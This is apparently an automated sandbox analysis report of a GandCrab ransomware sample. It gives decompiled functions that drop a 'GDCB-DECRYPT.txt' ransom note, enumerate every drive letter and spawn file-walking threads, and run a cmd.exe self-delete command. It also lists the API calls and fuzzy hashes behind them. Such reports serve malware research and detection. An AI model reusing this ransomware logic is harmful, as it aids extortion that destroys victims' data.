                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                        • lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67288
                                        • lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67296
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 344bc6df6f17eb5d75970bce0a6112b1c5b1d66c1eff5dc9942ec81b193a32d3
                                        • Instruction ID: 771d46ce8a368b329dac43ceac7b2085a29d482d8062802d4652d9162f0cb91a
                                        • Opcode Fuzzy Hash: 344bc6df6f17eb5d75970bce0a6112b1c5b1d66c1eff5dc9942ec81b193a32d3
                                        • Instruction Fuzzy Hash: 9B415132108613EFC7115FB9DE8E794B7A1FF0432AF084935E51692A21D77AB978DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC653A0 Relevance: 18.1, APIs: 12, Instructions: 92filestringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC653A0(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}




















                                        0x0fc653b7
                                        0x0fc653bf
                                        0x0fc653c9
                                        0x0fc653cc
                                        0x0fc653eb
                                        0x0fc653ed
                                        0x0fc653f3
                                        0x0fc65404
                                        0x0fc6540a
                                        0x0fc6540f
                                        0x0fc6541a
                                        0x0fc65420
                                        0x0fc65425
                                        0x0fc65427
                                        0x0fc65427
                                        0x0fc6542b
                                        0x0fc6542e
                                        0x0fc65435
                                        0x0fc65437
                                        0x0fc65442
                                        0x0fc65444
                                        0x0fc65446
                                        0x0fc65449
                                        0x0fc65453
                                        0x0fc6544b
                                        0x0fc6544b
                                        0x0fc6544d
                                        0x0fc6544e
                                        0x0fc6544e
                                        0x0fc65458
                                        0x0fc65459
                                        0x0fc6545f
                                        0x0fc65464
                                        0x0fc65446
                                        0x0fc6546b
                                        0x0fc65471
                                        0x0fc65474
                                        0x0fc65474
                                        0x0fc6547a
                                        0x0fc6547a
                                        0x0fc65481
                                        0x0fc65481
                                        0x0fc6549b

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0FC655B2), ref: 0FC653B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FC655B2), ref: 0FC653CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0FC655B2), ref: 0FC653E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0FC655B2), ref: 0FC65404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0FC655B2), ref: 0FC6541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0FC655B2), ref: 0FC6543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0FC655B2), ref: 0FC65459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0FC655B2), ref: 0FC6547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0FC655B2), ref: 0FC65481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0FC655B2), ref: 0FC6548F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 76b1bcb71e7b9b71f45f8852fada5b8a809c4a06aead34f91042aa664833f4c8
                                        • Instruction ID: e4f3718cfe99b6caf0ed0978973985537ad2bafc96beacd88aaf0e15a718ef4a
                                        • Opcode Fuzzy Hash: 76b1bcb71e7b9b71f45f8852fada5b8a809c4a06aead34f91042aa664833f4c8
                                        • Instruction Fuzzy Hash: 4231E730748316FBE7204FA59C8BFAD7B78EF05B12F244454F741BA1C1CAB9A5108B68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59filememorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC66BE0(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfc72a64; // 0x1f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfc72a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}









                                        0x0fc66bfb
                                        0x0fc66c03
                                        0x0fc66c25
                                        0x0fc66c2a
                                        0x0fc66c3e
                                        0x0fc66c45
                                        0x0fc66c5e
                                        0x0fc66c5e
                                        0x0fc66c65
                                        0x0fc66c6b
                                        0x0fc66c2c
                                        0x0fc66c39
                                        0x0fc66c39
                                        0x0fc66c78
                                        0x0fc66c86

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FC66CC2,00000000,?,?), ref: 0FC66BF5
                                        • wsprintfW.USER32 ref: 0FC66C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FC66C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0FC66C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0FC66C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FC66C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0FC66C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 15a416c445b8e6dce533fe37c4250fd2648c51fb592dbd39ccb0a5029495a017
                                        • Instruction ID: 5d778437e345c3c2d9869f4e1b91cef97bb80bd279ef062cff24ad0225305cd4
                                        • Opcode Fuzzy Hash: 15a416c445b8e6dce533fe37c4250fd2648c51fb592dbd39ccb0a5029495a017
                                        • Instruction Fuzzy Hash: D0017575348301BBF3201B66AD8BF6A3B6CEB45B36F100114FB05F91C1DBA969209769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65190 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC65190() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}





                                        0x0fc651b6
                                        0x0fc651ba
                                        0x0fc651be
                                        0x0fc651c8
                                        0x0fc651d0
                                        0x0fc651d9
                                        0x0fc651f3
                                        0x0fc651f3
                                        0x0fc651d0
                                        0x0fc651fb

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FC65392,00000000), ref: 0FC651A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC651B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FC651C8
                                        • wsprintfW.USER32 ref: 0FC651D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FC651F3
                                        • ExitProcess.KERNEL32 ref: 0FC651FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 302d2383e68f5d2c660c836f7cba11166f49a15639861a9a8fcc5e93e9e525e7
                                        • Instruction ID: 033824e59e59782c63030a725b8081e9162e938a943f724278b9d549a3e9cbaa
                                        • Opcode Fuzzy Hash: 302d2383e68f5d2c660c836f7cba11166f49a15639861a9a8fcc5e93e9e525e7
                                        • Instruction Fuzzy Hash: 7BF065317CD311B7F13116565C5FF472D689B85F26F280014F705BE1C299E46510C7AD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC62C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62stringthreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0FC62C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfc6f290; // 0x21
				asm("movdqu xmm0, [0xfc6f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FC62AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}










                                        0x0fc62c59
                                        0x0fc62c5e
                                        0x0fc62c66
                                        0x0fc62c69
                                        0x0fc62c70
                                        0x0fc62c76
                                        0x0fc62c79
                                        0x0fc62ce9
                                        0x0fc62cf2
                                        0x0fc62d01
                                        0x0fc62c7b
                                        0x0fc62c7e
                                        0x0fc62c9f
                                        0x0fc62cbd
                                        0x0fc62ccb
                                        0x0fc62cd7
                                        0x0fc62c80
                                        0x0fc62c94
                                        0x0fc62c94
                                        0x0fc62c7e

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0FC62C8A
                                        • BeginPaint.USER32(?,?), ref: 0FC62C9F
                                        • lstrlenW.KERNEL32(?), ref: 0FC62CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FC62CBD
                                        • EndPaint.USER32(?,?), ref: 0FC62CCB
                                        • CreateThread.KERNEL32 ref: 0FC62CE9
                                        • DestroyWindow.USER32(?), ref: 0FC62CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: fd5b9dacf51ff4129e0c5b9efb573899de362771c8f353df05ae4cb75d603726
                                        • Instruction ID: 713981951e9c02d9dcd35cfcb1a37567976fd8b97c8a4862971263d1734d0396
                                        • Opcode Fuzzy Hash: fd5b9dacf51ff4129e0c5b9efb573899de362771c8f353df05ae4cb75d603726
                                        • Instruction Fuzzy Hash: 4811B63250820ABBD711DF54EC0BFEA7BA8FB48322F000616FE41E5190E7719520DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63E20 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E0FC63E20(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfc6f348; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FC66DE0, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FC65670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}










































                                        0x0fc63e26
                                        0x0fc63e38
                                        0x0fc63e3c
                                        0x0fc63e40
                                        0x0fc63e4b
                                        0x0fc63e4e
                                        0x0fc63e50
                                        0x0fc63e53
                                        0x0fc63e58
                                        0x0fc63e5c
                                        0x0fc63e61
                                        0x0fc63e6b
                                        0x0fc63e6f
                                        0x0fc63e76
                                        0x0fc63e80
                                        0x0fc63e84
                                        0x0fc63e8a
                                        0x0fc63e93
                                        0x0fc63ea2
                                        0x0fc63ea5
                                        0x0fc63eb2
                                        0x0fc63eb5
                                        0x0fc63ebb
                                        0x0fc63ec2
                                        0x0fc63ecf
                                        0x0fc63ed3
                                        0x0fc63ed4
                                        0x0fc63ed4
                                        0x0fc63ed7
                                        0x0fc63ed8
                                        0x0fc63ee6
                                        0x0fc63eea
                                        0x0fc63eed
                                        0x0fc63ef7
                                        0x0fc63eff
                                        0x0fc63f05
                                        0x0fc63f0b
                                        0x0fc63f11
                                        0x0fc63f1b
                                        0x0fc63f22
                                        0x0fc63f26
                                        0x0fc63f2a
                                        0x0fc63f2c
                                        0x0fc63f34
                                        0x0fc63f3d
                                        0x0fc63f9c
                                        0x0fc63fa0
                                        0x0fc63f3f
                                        0x0fc63f3f
                                        0x0fc63f42
                                        0x0fc63f48
                                        0x0fc63f4f
                                        0x0fc63f50
                                        0x0fc63f57
                                        0x0fc63f5b
                                        0x0fc63f60
                                        0x0fc63f67
                                        0x0fc63f6a
                                        0x0fc63f6e
                                        0x0fc63f78
                                        0x0fc63f7a
                                        0x0fc63f7e
                                        0x0fc63f81
                                        0x0fc63f84
                                        0x0fc63f84
                                        0x0fc63f84
                                        0x0fc63f8a
                                        0x0fc63f8e
                                        0x0fc63f92
                                        0x0fc63f96
                                        0x0fc63f96
                                        0x0fc63fa6
                                        0x0fc63fca
                                        0x0fc63fa8
                                        0x0fc63fa8
                                        0x0fc63fb2
                                        0x0fc63fb6
                                        0x0fc63fbd
                                        0x0fc63fd4
                                        0x0fc63fd8
                                        0x0fc63ff6

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FC63E40
                                        • GetTickCount.KERNEL32 ref: 0FC63E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0FC63E8A
                                        • CreateThread.KERNEL32 ref: 0FC63EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FC63F0B
                                        • GetTickCount.KERNEL32 ref: 0FC63F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 7902257db66c6c0258cc6846b0836076487276a7efa3cc2a8d77a32b13e3ad34
                                        • Instruction ID: ca0a2670b81c09a896fd1c79db1d6cfa567c8f60d5aff7887960ad6b60822724
                                        • Opcode Fuzzy Hash: 7902257db66c6c0258cc6846b0836076487276a7efa3cc2a8d77a32b13e3ad34
                                        • Instruction Fuzzy Hash: 7A5124709083419FC310CF19C885B5ABBE5FF88325F504A2DFA89AB391D775A944CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66DE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47memorythreadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC66DE0(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FC66C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}











                                        0x0fc66df9
                                        0x0fc66dff
                                        0x0fc66e0e
                                        0x0fc66e1c
                                        0x0fc66e30
                                        0x0fc66e38
                                        0x0fc66e40
                                        0x0fc66e48
                                        0x0fc66e56
                                        0x0fc66e6b
                                        0x0fc66e7b
                                        0x0fc66e83

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FC66DF9
                                        • wsprintfW.USER32 ref: 0FC66E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0FC66E1C
                                        • VirtualAlloc.KERNEL32 ref: 0FC66E50
                                          • Part of subcall function 0FC66C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                          • Part of subcall function 0FC66C90: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                          • Part of subcall function 0FC66C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FC66E7B
                                        • ExitThread.KERNEL32 ref: 0FC66E83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
                                        • Opcode ID: b9ec68e84a49d8627d71df87c56442aa97a2709546719911ac9955738f00ec6a
                                        • Instruction ID: c52feb5618f391298aa6c6f802b1177dff22310ac2cece5dacdc3a5a13e55e41
                                        • Opcode Fuzzy Hash: b9ec68e84a49d8627d71df87c56442aa97a2709546719911ac9955738f00ec6a
                                        • Instruction Fuzzy Hash: FE0184B5148301BFE7109F55DC8BF167BA8EB44B21F004614FB65AD1C1D7B89514CBAA
